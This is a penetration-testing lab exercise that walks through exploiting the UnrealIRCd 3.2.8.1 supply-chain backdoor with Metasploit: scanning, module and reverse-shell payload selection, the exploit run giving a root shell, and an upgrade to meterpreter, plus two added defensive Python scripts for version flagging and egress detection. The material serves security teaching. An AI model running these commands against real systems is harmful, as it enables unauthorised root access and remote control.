
Fundamentals of Penetration Testing

Exercise: Unreal IRC backdoor

Medium
20 min

In this exercise, we will go through an example of how you can use Metasploit for exploiting a vulnerability. We will cover each step, so you can start the lab and follow along at your own pace.

Unreal IRC backdoor

Flag

Find the flag from the lab environment and enter it below.


Let's start with the familiar steps, i.e. mapping. Start the database, prepare it, and perform the initial scans with the db_nmap command. Note that ICMP (ping) is blocked on the target, so it won't answer the ICMP probes that nmap uses by default for host discovery and would be reported as down. The -Pn switch skips host discovery and scans the host regardless.

msf6 > db_nmap -Pn -p22,6667 -A 10.0.2.39
[*] Nmap: Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 21:22 UTC
[*] Nmap: Nmap scan report for 10.0.2.39
[*] Nmap: Host is up (0.000057s latency).
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh hostkey:
[*] Nmap: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
[*] Nmap: |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 6667/tcp open irc UnrealIRCd
[*] Nmap: | irc info:
[*] Nmap: | users: 1
[*] Nmap: | servers: 1
[*] Nmap: | losers: 1
[*] Nmap: | lservers: 0
[*] Nmap: | server: irc.Metasploitable.LAN
[*] Nmap: | version: Unreal3.2.8.1. irc.Metasploitable.LAN
[*] Nmap: | uptime: 0 days, 0:04:19
[*] Nmap: | source id: nmap
[*] Nmap: | source host: Test-946EE70D.local
[*] Nmap: |_ error: Closing Link: iztjsqbbs[attacker.local] (Quit: iztjsqbbs)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: OS Fingerprint not ideal because: Missing a closed TCP port so results incomplete
[*] Nmap: No OS matches for host
[*] Nmap: Network Distance: 2 hops
[*] Nmap: Service Info: Host: irc.Metasploitable.LAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE (using port 22/tcp)
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 ...
[*] Nmap: 2 0.03ms 10.0.2.39
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.63 seconds

We see from the nmap output that the target system is running the UnrealIRCd service on port 6667, and more specifically version 3.2.8.1 of it. The output also indicates that the server is Linux-based. Next, let's check whether Metasploit has an exploit module we could use against this IRC service.
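The version banner is the same information a defender's asset inventory should be matching against known-bad releases. The following is an added example, not part of the exercise: it parses db_nmap output as msfconsole prints it, pulls the UnrealIRCd version reported by nmap's irc-info script, and flags the 3.2.8.1 release named in the module description (CVE-2010-2075). The sample input is constructed from the scan above, and the "[*] Nmap: " prefix format and the version table are assumptions of this script.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the db_nmap lines from this exercise, with the
# "[*] Nmap: " prefix that msfconsole adds to each line.
SAMPLE_DB_NMAP_OUTPUT = """\
[*] Nmap: Nmap scan report for 10.0.2.39
[*] Nmap: Host is up (0.000057s latency).
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh hostkey:
[*] Nmap: |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 6667/tcp open irc UnrealIRCd
[*] Nmap: | irc info:
[*] Nmap: | users: 1
[*] Nmap: | version: Unreal3.2.8.1. irc.Metasploitable.LAN
[*] Nmap: |_ error: Closing Link: iztjsqbbs[attacker.local] (Quit: iztjsqbbs)
"""

# The release whose download archive carried the backdoor (CVE-2010-2075),
# per the module description in this exercise. Extend as needed.
BACKDOORED_UNREAL_VERSIONS = {"3.2.8.1": "CVE-2010-2075"}

NMAP_PREFIX = "[*] Nmap: "
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
# irc-info prints e.g. "| version: Unreal3.2.8.1. irc.Metasploitable.LAN"
IRC_VERSION_RE = re.compile(r"^\|_?\s*version:\s*Unreal(\d+(?:\.\d+)+)")


@dataclass(frozen=True)
class Finding:
    host: str
    port: int
    version: str
    cve: str


def parse_irc_versions(output: str) -> list[tuple[str, int, str]]:
    """Return (host, port, version) for every UnrealIRCd banner in db_nmap output."""
    results = []
    host, port, service = None, None, None
    for raw in output.splitlines():
        line = raw[len(NMAP_PREFIX):] if raw.startswith(NMAP_PREFIX) else raw
        line = line.strip()
        if m := HOST_RE.match(line):
            host, port, service = m.group(1), None, None
            continue
        if m := PORT_RE.match(line):
            port, service = int(m.group(1)), m.group(2)
            continue
        # Script output lines ("| key: value") belong to the port parsed last.
        if service == "irc" and (m := IRC_VERSION_RE.match(line)):
            results.append((host, port, m.group(1)))
    return results


def find_backdoored_unreal(output: str) -> list[Finding]:
    """Flag hosts whose UnrealIRCd banner matches a version with a known backdoor."""
    findings = []
    for host, port, version in parse_irc_versions(output):
        cve = BACKDOORED_UNREAL_VERSIONS.get(version)
        if cve:
            findings.append(Finding(host, port, version, cve))
    return findings


if __name__ == "__main__":
    for f in find_backdoored_unreal(SAMPLE_DB_NMAP_OUTPUT):
        print(f"{f.host}:{f.port} UnrealIRCd {f.version} -> {f.cve}")
```

A banner match tells you the version, not whether this particular binary was built from the trojaned tarball, so treat a hit as "verify the install against the vendor's published checksums and patch", not as proof of compromise.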

msf6 > search Exploit Unreal

Matching Modules
================

   # Name Disclosure Date Rank Check Description
   - ---- --------------- ---- ----- -----------
   0 exploit/linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux)
   1 exploit/windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32)
   2 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution

There is one exploit module available for this service and version that seems very promising. Let's select it and read more about it. We use the use command to select this module and then run the info command to see more information about it.

Basic options:
  Name Current Setting Required Description
  ---- -------------- -------- -----------
  RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT 6667 yes The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a malicious backdoor that was added to the
  Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
  Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2010-2075
  OSVDB (65445)
  http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

The description tells us that this module exploits a backdoor that someone planted in the official download archive of this version: a software supply-chain compromise rather than an ordinary coding flaw. Very interesting!

First, let's configure the module settings correctly.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.0.2.39
RHOSTS => 10.0.2.39
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name Current Setting Required Description
   ---- -------------- -------- -----------
   RHOSTS 10.0.2.39 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT 6667 yes The target port (TCP)


Exploit target:

   Id Name
   -- ----
   0 Automatic Target

Next, let's set up the payload settings. We can list the payloads that this exploit module supports by using the show payloads command.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   # Name Disclosure Date Rank Check Description
   - ---- --------------- ---- ----- -----------
   0 payload/cmd/unix/adduser normal No Add user with useradd
   1 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
   2 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
   3 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
   4 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
   5 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
   6 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
   7 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
   8 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
   9 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
   10 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
   11 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
   12 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)

We choose payload number 6 from the list, which creates a reverse connection, meaning the target system connects back to our listener. It is important to remember that firewalls often block inbound connections to the target system, which is what a bind payload would need, but almost always allow the target system to make unrestricted outbound connections, which is exactly what a reverse payload relies on.
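The same asymmetry is what a defender can turn around: a server that only ever accepts connections has no business initiating new ones to arbitrary hosts. The following is an added example, not part of the exercise, showing egress detection over a constructed connection log whose last two entries mirror the reverse connections this lab produces. The log format, the server address and the allowlist are assumptions; map your own sensor's fields onto them.

```python
from dataclasses import dataclass
from datetime import datetime

# Constructed sample log: one line per new TCP connection seen at the network
# boundary, in an assumed "timestamp src:sport -> dst:dport" format (IPv4 only).
# The last two lines mirror the reverse connections from this exercise.
SAMPLE_CONN_LOG = """\
2023-10-08T21:22:01Z 10.0.2.55:41022 -> 10.0.2.39:6667
2023-10-08T21:22:01Z 10.0.2.55:41023 -> 10.0.2.39:22
2023-10-08T21:30:10Z 10.0.2.39:54001 -> 10.0.2.1:53
2023-10-08T21:36:32Z 10.0.2.39:52094 -> 10.0.2.55:4444
2023-10-08T21:48:49Z 10.0.2.39:40716 -> 10.0.2.55:4433
"""

# Assumed policy for the IRC server: the only connections it may *initiate*.
# Everything else outbound is reported regardless of destination port, so a
# handler moved off the default 4444 is still caught.
IRC_SERVER = "10.0.2.39"
ALLOWED_EGRESS = {("10.0.2.1", 53)}  # e.g. the local DNS resolver


@dataclass(frozen=True)
class Conn:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


def parse_conn_log(text: str) -> list[Conn]:
    """Parse the assumed log format into Conn records, skipping blank lines."""
    conns = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, arrow, dst = line.split()
        assert arrow == "->", f"unexpected line: {line!r}"
        src_ip, sport = src.rsplit(":", 1)
        dst_ip, dport = dst.rsplit(":", 1)
        conns.append(Conn(datetime.fromisoformat(ts.replace("Z", "+00:00")),
                          src_ip, int(sport), dst_ip, int(dport)))
    return conns


def unexpected_egress(conns: list[Conn], server: str,
                      allowed: set[tuple[str, int]]) -> list[Conn]:
    """Return connections the server initiated to destinations outside the allowlist."""
    return [c for c in conns
            if c.src == server and (c.dst, c.dport) not in allowed]


if __name__ == "__main__":
    for c in unexpected_egress(parse_conn_log(SAMPLE_CONN_LOG), IRC_SERVER, ALLOWED_EGRESS):
        print(f"{c.ts.isoformat()} ALERT {c.src}:{c.sport} -> {c.dst}:{c.dport} "
              f"(server initiated unexpected outbound connection)")
```

The detection deliberately keys on direction and an allowlist rather than on port 4444, because the listener port is a one-line change for the attacker while "this server opened an outbound connection it never does" is not. The matching mitigation is an egress filter on the host or boundary firewall that enforces the same allowlist, which turns a successful command execution into a payload that cannot phone home.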

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload payload/cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name Current Setting Required Description
   ---- -------------- -------- -----------
   CHOST no The local client address
   CPORT no The local client port
   Proxies no A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS 10.0.2.39 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT 6667 yes The target port (TCP)


Payload options (cmd/unix/reverse):

   Name Current Setting Required Description
   ---- -------------- -------- -----------
   LHOST yes The listen address (an interface may be specified)
   LPORT 4444 yes The listening port


Exploit target:

   Id Name
   -- ----
   0 Automatic Target

As can be seen from the output, Metasploit payloads use port 4444 by default; that is the port our listener binds and the target connects back to. This suits us as well, but we still need to set the LHOST parameter, the IP address the listener binds to and the payload connects back to. (The attacking machine may sit in several networks at the same time, so specifying this explicitly is a good idea.)

We check our own IP address by running the regular ip a command. msfconsole passes commands it does not recognise to the underlying shell, as the exec: line in the output shows.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > ip a
[*] exec: ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
11780: eth0@if11781: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 76:8f:58:15:db:b4 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.0.2.55/32 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::748f:58ff:fe15:dbb4/64 scope link
       valid_lft forever preferred_lft forever

After this, we will set the IP as the LHOST parameter and double-check that all the settings are correct.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 10.0.2.55
LHOST => 10.0.2.55
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name Current Setting Required Description
   ---- -------------- -------- -----------
   CHOST no The local client address
   CPORT no The local client port
   Proxies no A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS 10.0.2.39 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT 6667 yes The target port (TCP)


Payload options (cmd/unix/reverse):

   Name Current Setting Required Description
   ---- -------------- -------- -----------
   LHOST 10.0.2.55 yes The listen address (an interface may be specified)
   LPORT 4444 yes The listening port


Exploit target:

   Id Name
   -- ----
   0 Automatic Target

Once we are sure the preparation for the attack is complete, we run the exploit with the exploit command.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 10.0.2.55:4444
[*] 10.0.2.39:6667 - Connected to 10.0.2.39:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] 10.0.2.39:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 2mK6xqyIvvFWXRFt;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "2mK6xqyIvvFWXRFt\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.0.2.55:4444 -> 10.0.2.39:52094) at 2023-10-08 21:36:32 +0000

id
uid=0(root) gid=0(root) groups=0(root)

We have now successfully exploited the backdoor in the target system and obtained a remote shell as root, i.e. full administrative access, because the IRC daemon itself was running as root.

Next, let's see whether we can upgrade this plain command shell to a more versatile meterpreter session. Start by sending the current session to the background (CTRL-z). Existing sessions are listed with the sessions command, and sessions -i <id> resumes a given session.

id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N] y
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > sessions

Active sessions
===============

  Id Name Type Information Connection
  -- ---- ---- ----------- ----------
  1 shell cmd/unix 10.0.2.55:4444 -> 10.0.2.39:52094 (10.0.2.39)

In Metasploit there is a useful post module, post/multi/manage/shell_to_meterpreter, that attempts to open a new meterpreter session through an existing shell session. Let's try it.

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.0.2.55:4433
[*] Sending stage (1017704 bytes) to 10.0.2.39
[*] Meterpreter session 2 opened (10.0.2.55:4433 -> 10.0.2.39:40716) at 2023-10-08 21:48:49 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id Name Type Information Connection
  -- ---- ---- ----------- ----------
  1 shell cmd/unix 10.0.2.55:4444 -> 10.0.2.39:52094 (10.0.2.39)
  2 meterpreter x86/linux root @ 10.0.2.39 10.0.2.55:4433 -> 10.0.2.39:40716 (10.0.2.39)

And voilà! We now have a functional meterpreter session on the target system.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

It is best to try it out yourself and see what can be done with this session. Start by reading the output of the help command.
